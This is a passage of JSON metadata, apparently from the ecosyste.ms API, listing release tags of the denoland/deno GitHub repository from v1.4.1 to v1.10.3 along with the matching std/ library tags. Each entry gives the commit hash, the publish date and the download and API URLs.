eases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{